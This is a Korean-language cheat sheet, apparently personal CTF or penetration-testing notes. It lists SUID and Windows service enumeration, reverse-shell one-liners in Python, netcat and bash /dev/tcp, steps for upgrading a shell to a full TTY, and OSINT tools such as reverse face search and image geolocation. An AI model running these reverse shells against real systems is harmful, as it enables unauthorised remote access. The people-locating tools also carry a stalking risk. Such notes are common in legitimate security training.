• SUID 권한이 있는 파일 찾기
  • find / -perm -u=s -type f 2>/dev/null
  • 이러한 파일은 사용자가 실행하는 대신 소유자의 권한으로 실행됩니다.
• 모든 서비스에 대한 권한 찾기
  • accesschk.exe -uwcqv *
  • 시스템 또는 관리자 계정에 속하지 않은 서비스를 찾으세요.
• 쿼리 서비스
  • sc qc <service name>
  • cmd.exe에서만 작동합니다.

• nc -lnvp <port>

• revshells.com
  • 기본적으로 필요한 모든 것을 위한 템플릿
• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
• nc -e /bin/sh <ip> <port>
• bash -i >& /dev/tcp/<ip>/<port> 0>&1

1. 다음 python 명령을 실행하여 부분적으로 대화형으로 만듭니다. python -c 'import pty;pty.spawn("/bin/bash");'
2. CTRL+Z 눌러 netcat 세션을 종료하고 로컬에서 stty raw -echo 실행하세요.
3. fg 명령(필요한 경우 나중에 작업 ID)을 사용하여 세션에 다시 들어갑니다.
4. export TERM=xterm 실행하여 터미널 에뮬레이터를 xterm으로 변경합니다(필요하지 않을 수도 있음).
5. export SHELL=bash 실행하여 쉘을 bash로 변경하십시오(필요하지 않을 수도 있음).
6. 완료! 이제 쉘은 완전히 대화형이어야 합니다.

1. 시스템에 rlwrap 설치
2. 이제 NC 리스너를 실행할 때마다 rlwrap 앞에 두십시오.
3. 예: rlwrap nc -lvnp 1337
   • 이것은 화살표 키와 명령 기록을 제공하지만 Windows 및 *nix 시스템에 대한 자동 완성(내가 알 수 있는 한)은 제공하지 않습니다.

• 피메예스
  • 인터넷에서 얼굴 역방향 검색
• OSINT 프레임워크
  • 수많은 OSINT 도구를 모아놓은 웹사이트
• GeoSpy AI
  • 이미지만으로 위치를 추정할 수 있는 지리공간 비전 LLM
• 고가도로 터보
  • OpenStreetMap API를 쿼리하고 결과를 시각화할 수 있는 웹사이트
• Bellingcat OSM 검색
  • OSM API를 쉽게 쿼리할 수 있는 웹사이트

• DNS 오류 해결

  • dig <site> <recordType>
  • 레코드 유형 목록
    • TXT 꼭 해보세요

• 바이너리를 다른 아키텍처로 실행

  • 64비트:
    • linux64 ./<binary>
  • 32비트:
    • linux32 ./<binary>

• MS 매크로 추출:

  • https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php

• CNC G코드 보기

  • https://ncviewer.com/